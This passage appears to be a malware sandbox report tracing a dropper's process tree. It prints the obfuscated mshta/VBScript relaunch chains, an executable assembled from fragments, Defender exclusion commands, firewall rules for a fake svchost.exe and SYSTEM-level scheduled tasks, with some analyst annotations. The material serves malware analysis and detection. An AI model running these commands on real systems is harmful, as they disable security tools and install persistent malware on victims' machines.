memory of 4640 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 92 PID 1436 wrote to memory of 4936 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 91 PID 1436 wrote to memory of 4936 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 91 PID 1436 wrote to memory of 4936 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 91 PID 1436 wrote to memory of 3736 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 98 PID 1436 wrote to memory of 3736 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 98 PID 1436 wrote to memory of 3736 1436 
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 98 PID 1436 wrote to memory of 884 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 97 PID 1436 wrote to memory of 884 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 97 PID 1436 wrote to memory of 884 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 97 PID 1436 wrote to memory of 2964 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 96 PID 1436 wrote to memory of 2964 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 96 PID 1436 wrote to memory of 2964 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 96 PID 1436 wrote to memory of 3312 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 103 PID 1436 wrote to memory of 3312 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 103 PID 1436 wrote to memory of 3312 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 103 PID 1436 wrote to memory of 5036 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 102 PID 1436 wrote to memory of 5036 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 102 PID 1436 wrote to memory of 5036 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 102 PID 1436 wrote to memory of 4196 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 101 PID 1436 wrote to memory of 4196 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 101 PID 1436 wrote to memory of 4196 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 101 PID 1436 wrote to memory of 4532 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 100 PID 1436 wrote to memory of 4532 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 100 PID 1436 wrote to memory of 4532 1436 
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 100 PID 1436 wrote to memory of 4760 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 99 PID 1436 wrote to memory of 4760 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 99 PID 1436 wrote to memory of 2088 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 105 PID 1436 wrote to memory of 2088 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 105 PID 1436 wrote to memory of 2088 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 105 PID 1436 wrote to memory of 4076 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 104 PID 1436 wrote to memory of 4076 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 104 PID 1436 wrote to memory of 4076 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 104 PID 1436 wrote to memory of 2172 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Users\Admin\Pictures\Adobe Films\jbA8_s3FlxHrMmUQPOwNJfp8.exe"C:\Users\Admin\Pictures\Adobe Films\jbA8_s3FlxHrMmUQPOwNJfp8.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4728
-
-
C:\Users\Admin\Pictures\Adobe Films\Up_EgQSePP1xxhPBvlLFqEqe.exe"C:\Users\Admin\Pictures\Adobe Films\Up_EgQSePP1xxhPBvlLFqEqe.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:4492 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\fl.exe"C:\Users\Admin\AppData\Local\Temp\fl.exe"4⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\Curarization.exe"C:\Users\Admin\AppData\Local\Temp\Curarization.exe"5⤵PID:1696
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\97tPLM1BD83QAkW3t_oh9ywr.exe"C:\Users\Admin\Pictures\Adobe Films\97tPLM1BD83QAkW3t_oh9ywr.exe"2⤵
- Executes dropped EXE
PID:4752 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 2923⤵
- Program crash
PID:6088
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6Gjg3NTuW9hb7SqYymgdkeKo.exe"C:\Users\Admin\Pictures\Adobe Films\6Gjg3NTuW9hb7SqYymgdkeKo.exe"2⤵
- Executes dropped EXE
PID:4624 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 2963⤵
- Program crash
PID:6084
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tG94gZUleeBFo8SDyi6butFz.exe"C:\Users\Admin\Pictures\Adobe Films\tG94gZUleeBFo8SDyi6butFz.exe"2⤵
- Executes dropped EXE
PID:2680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 3003⤵
- Program crash
PID:5968
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XMGMTu3eQAvQPR86eRMXlDO9.exe"C:\Users\Admin\Pictures\Adobe Films\XMGMTu3eQAvQPR86eRMXlDO9.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 19843⤵
- Program crash
PID:3204
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yJqr3GGVaG4To30s0MDWLG61.exe"C:\Users\Admin\Pictures\Adobe Films\yJqr3GGVaG4To30s0MDWLG61.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4936
-
-
C:\Users\Admin\Pictures\Adobe Films\KdlTj_CCMiXvvrf22JrhXXT5.exe"C:\Users\Admin\Pictures\Adobe Films\KdlTj_CCMiXvvrf22JrhXXT5.exe"2⤵
- Executes dropped EXE
PID:4640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 2763⤵
- Program crash
PID:5804
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cTOmx3wyJ995falPyP_CHHr6.exe"C:\Users\Admin\Pictures\Adobe Films\cTOmx3wyJ995falPyP_CHHr6.exe"2⤵
- Executes dropped EXE
PID:768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 3003⤵
- Program crash
PID:5440
-
-
-
C:\Users\Admin\Pictures\Adobe Films\o6NHz5BzimLqOLMlh9XEgPbX.exe"C:\Users\Admin\Pictures\Adobe Films\o6NHz5BzimLqOLMlh9XEgPbX.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Users\Admin\AppData\Roaming\2905016.exe"C:\Users\Admin\AppData\Roaming\2905016.exe"3⤵
- Executes dropped EXE
PID:6140
-
-
C:\Users\Admin\AppData\Roaming\3915497.exe"C:\Users\Admin\AppData\Roaming\3915497.exe"3⤵PID:5116
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:5264
-
-
-
C:\Users\Admin\AppData\Roaming\1955104.exe"C:\Users\Admin\AppData\Roaming\1955104.exe"3⤵PID:5128
-
-
C:\Users\Admin\AppData\Roaming\1210874.exe"C:\Users\Admin\AppData\Roaming\1210874.exe"3⤵PID:5720
-
-
C:\Users\Admin\AppData\Roaming\8799358.exe"C:\Users\Admin\AppData\Roaming\8799358.exe"3⤵PID:1528
-
-
C:\Users\Admin\AppData\Roaming\250902.exe"C:\Users\Admin\AppData\Roaming\250902.exe"3⤵PID:3472
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\250902.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\250902.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )4⤵PID:2032
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\250902.exe"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\250902.exe" ) do taskkill /F /Im "%~Nxk"5⤵PID:2424
-
C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXEkStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ6⤵PID:4488
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )7⤵PID:2360
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"8⤵PID:3300
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH& CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )7⤵PID:4732
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo %DatE%cl1V>8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH& CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM8⤵PID:5528
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "9⤵PID:3628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"9⤵PID:4564
-
-
C:\Windows\SysWOW64\control.execontrol .\GKq1GTV.ZnM9⤵PID:1320
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM10⤵PID:2664
C:\Windows\SysWOW64\taskkill.exetaskkill /F /Im "250902.exe"6⤵
- Kills process with taskkill
PID:5772
C:\Users\Admin\AppData\Roaming\848820.exe"C:\Users\Admin\AppData\Roaming\848820.exe"3⤵PID:4940
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZvQmBbFSxCcYQP4fGiwTawkt.exe"C:\Users\Admin\Pictures\Adobe Films\ZvQmBbFSxCcYQP4fGiwTawkt.exe"2⤵
- Executes dropped EXE
PID:4400
-
-
C:\Users\Admin\Pictures\Adobe Films\XATuOQAsPCyh5ifJCHUEKp4p.exe"C:\Users\Admin\Pictures\Adobe Films\XATuOQAsPCyh5ifJCHUEKp4p.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s) — "PowerControl LG": runs "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" at every logon (/sc ONLOGON) with /rl HIGHEST, i.e. logon persistence at the highest run level available to the "Admin" account
PID:5608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s) — "PowerControl HR": re-launches the same PowerControl_Svc.exe every hour (/sc HOURLY) with /rl HIGHEST, a second persistence trigger alongside the ONLOGON task
PID:3792
-
-
C:\Users\Admin\Documents\wkqlUMWTeA4MzwNheOfGeZIF.exe"C:\Users\Admin\Documents\wkqlUMWTeA4MzwNheOfGeZIF.exe"3⤵PID:5424
-
C:\Users\Admin\Pictures\Adobe Films\byAMTPsi0wjZyzTcnGrAnURo.exe"C:\Users\Admin\Pictures\Adobe Films\byAMTPsi0wjZyzTcnGrAnURo.exe"4⤵PID:504
-
-
C:\Users\Admin\Pictures\Adobe Films\lOxrLkIZuQMAQx5v4HoaEB9b.exe"C:\Users\Admin\Pictures\Adobe Films\lOxrLkIZuQMAQx5v4HoaEB9b.exe"4⤵PID:4080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 3005⤵
- Program crash
PID:4172
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"4⤵PID:3036
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe" ) do taskkill -f -iM "%~NxM"6⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵PID:5636
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:456
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:3660
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "wcnBXcNqNjGhlzUr2QOQS7bQ.exe"7⤵
- Kills process with taskkill
PID:104
C:\Users\Admin\Pictures\Adobe Films\4Jy2g3hpKf38lVQDNfIL6jtp.exe"C:\Users\Admin\Pictures\Adobe Films\4Jy2g3hpKf38lVQDNfIL6jtp.exe"4⤵PID:5244
-
-
C:\Users\Admin\Pictures\Adobe Films\n0XA6WpRiv72ADyrBgNcyvZr.exe"C:\Users\Admin\Pictures\Adobe Films\n0XA6WpRiv72ADyrBgNcyvZr.exe"4⤵PID:5044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 17285⤵
- Program crash
PID:1560
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uwcqTvoJZyFzdwFOrgjLNk3L.exe"C:\Users\Admin\Pictures\Adobe Films\uwcqTvoJZyFzdwFOrgjLNk3L.exe"4⤵PID:2360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 3005⤵
- Program crash
PID:2156
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rWYYU7N_3Z5NV5mnXDAZrzLw.exe"C:\Users\Admin\Pictures\Adobe Films\rWYYU7N_3Z5NV5mnXDAZrzLw.exe"4⤵PID:2164
-
-
C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe"C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe"4⤵
- Executes dropped EXE
PID:5116 -
C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe"C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe" -u5⤵PID:2212
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mEVi6awdxn3B5TPdUOnnLpe4.exe"C:\Users\Admin\Pictures\Adobe Films\mEVi6awdxn3B5TPdUOnnLpe4.exe"4⤵PID:5184
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵PID:2852
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"4⤵PID:4140
-
C:\Users\Admin\AppData\Local\Temp\is-902FK.tmp\mVRZrkcUJS1yczCv3qSCSgz0.tmp"C:\Users\Admin\AppData\Local\Temp\is-902FK.tmp\mVRZrkcUJS1yczCv3qSCSgz0.tmp" /SL5="$402A8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"5⤵PID:2568
C:\Users\Admin\Pictures\Adobe Films\dsqTtt9nQpWwz1yYMBAEipS6.exe"C:\Users\Admin\Pictures\Adobe Films\dsqTtt9nQpWwz1yYMBAEipS6.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:884
-
-
C:\Users\Admin\Pictures\Adobe Films\wn6Tr5ouTTYnpiBNWaXIcaFu.exe"C:\Users\Admin\Pictures\Adobe Films\wn6Tr5ouTTYnpiBNWaXIcaFu.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3736
-
-
C:\Users\Admin\Pictures\Adobe Films\IDyIlZ0vcJMZmpFNQrobzffX.exe"C:\Users\Admin\Pictures\Adobe Films\IDyIlZ0vcJMZmpFNQrobzffX.exe"2⤵
- Executes dropped EXE
PID:4760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵PID:5688
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3184
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵PID:4912 — note: this second Defender exclusion uses the \\?\ prefix and a "C:\Windows " path with a trailing space (distinct from the c:\windows\ exclusion above); together with the firewall rules and scheduled task below it prepares the C:\Windows\System\svchost.exe drop, so an Add-MpPreference / Set-MpPreference invocation from a non-admin-tool parent is the detection point here
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:5348
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Suspicious use of SetThreadContext
- Creates scheduled task(s) — "Timer": runs c:\windows\system\svchost.exe every 7 minutes (/sc minute /mo 7) as SYSTEM (/ru SYSTEM) until 11/02/2024; note the binary lives in C:\Windows\System, not the legitimate C:\Windows\system32\svchost.exe seen at the wuauserv/UsoSvc entries further down, so this is a svchost.exe lookalike gaining SYSTEM persistence
PID:3312 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:768
-
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:5900
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵PID:5736
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:3848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵PID:5876
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:2032
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:5944
C:\Users\Admin\Pictures\Adobe Films\cBHStp1tUjbmpWGPeFPixzx7.exe"C:\Users\Admin\Pictures\Adobe Films\cBHStp1tUjbmpWGPeFPixzx7.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4532
-
-
C:\Users\Admin\Pictures\Adobe Films\33CEtghZf4kJPxQoBSqEUgkF.exe"C:\Users\Admin\Pictures\Adobe Films\33CEtghZf4kJPxQoBSqEUgkF.exe"2⤵
- Executes dropped EXE
PID:4196
-
-
C:\Users\Admin\Pictures\Adobe Films\kMCLvaZxUoL4ETDwWQqOc6MX.exe"C:\Users\Admin\Pictures\Adobe Films\kMCLvaZxUoL4ETDwWQqOc6MX.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:2044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 5603⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5832
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"2⤵
- Executes dropped EXE
PID:3312 -
C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:6048
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LPvnU5MCa7evfTEqGJQeEKaS.exe"C:\Users\Admin\Pictures\Adobe Films\LPvnU5MCa7evfTEqGJQeEKaS.exe"2⤵
- Executes dropped EXE
PID:4076 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 2043⤵
- Program crash
PID:6080
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DJQTgMZwK7ZPTQPNMIvPAKa5.exe"C:\Users\Admin\Pictures\Adobe Films\DJQTgMZwK7ZPTQPNMIvPAKa5.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2088 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:1832
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Cf1aoIESdkQ91XunX7mxtiH7.exe"C:\Users\Admin\Pictures\Adobe Films\Cf1aoIESdkQ91XunX7mxtiH7.exe"2⤵
- Executes dropped EXE
PID:3184
-
-
C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"2⤵
- Executes dropped EXE
PID:2172 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵PID:4304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe" ) do taskkill -im "%~NxK" -F4⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵PID:5780
-
